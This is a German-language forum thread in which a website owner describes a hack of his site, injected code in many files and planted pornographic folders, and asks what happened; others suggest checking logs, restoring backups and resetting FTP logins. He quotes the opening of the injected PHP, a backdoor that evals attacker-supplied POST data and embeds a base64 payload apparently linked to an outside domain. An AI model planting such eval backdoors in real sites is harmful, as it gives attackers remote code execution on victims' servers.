tmp_lkojfghx ???

Muruda · 18.07.09, 22:57

Hallo !
Ich habe eine Webseite. Diese würde gehackt. In vielen Datein ist jetzt ein Virus. Außerdem habe ich jetzt neue Ordner mit Porno-Inhalt.

Der Code der eingefügt wurde fängt so an :

if(!function_exists('tmp_lkojfghx'))
{
if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsY W ........

Irgendwie will der Code zur Seite : martuz.cn

Kann mir jemand sagen was da abgeht? Oder mir sagen wo ich lesen muß um es zu verstehen damit ich einen Schutz einbauen kann.

Danke

manta656 · 18.07.09, 23:13

also was ich dir sagen kann ist nur vom Programmieren mit anderen Sprachen als Php
If then =

If ordner a existiert
then verschieben Ordner b in Ordner a

also falls etwas so ist , dann geschieht etwas

soweit ich das hier verstanden hab

Code:

if(!function_exists('tmp_lkojfghx'))

wenn die Funktion tmp_lkojfghx existiert , dann.....
Eine Funktion , ist meist in anderen Dateien oder anderen Abschnitten den Codes .

Und der Code wurde in die index.php oder html eingefügt ? oder wo genau ? Bitte mehr Details

mfg manta

Muruda · 18.07.09, 23:28

Ich dank dir für deine Hilfe. Der Code geht noch weiter. Habe nicht alles hier eingefügt. Ich denke das wenn jemand den "Code" kennt weiß was abgeht. Bis jetzt habe ich rausgefunden das es sich wohl um eine Art von "PHP Code Injection". Ein Ordner hatte die Rechte 777. Ich glaube das der Angriff davon ausging. Habe jetzt alle Orner auf 755 gestellt und jede Datei auf 644.
Ich weiß zwar nicht wie das geht aber wenn jemand es geschaft hat in diesen Ordner etwas "rein zu kopieren" und es dann ausgeführt hat, könnte ich mir vorstellen das der Code sich leicht verbreitet weil er ja so zu sagen "auf Admin Ebene" ist (also auf dem Server). Nur so kann ich mir erklären wie er Datein verändert hat die in htaccess geschützen Ordnern lagen.
Was mich auch nachdenklich macht ist das scheinbar jemand per FTP auf dem Server war. Ich habe auf jeden Fall das gefühl das meine Logdatein "frisiert" sind. Das muß ich aber selber noch weiter prüfen. Vielleicht habe ich auch gerade nur ein wenig Paranoia

PDM502 · 19.07.09, 00:14

Je nach Anbieter des Webspace/Servers stellen sie dir logs zur Verfügung wo die Zugriffe mit ip und Uhrzeit gespeichert werden.. Wäre das einfachste dadrüber zu gucken ob jemand fremdes drinnen war.. Und egal ob oder ob nicht, würde ich nen Backup der Daten aufspielen und die veränderten komplett löschen, vorher alle PW löschen und die FTP's komplett neu anlegen (also neue Login Namen und PW ..) ..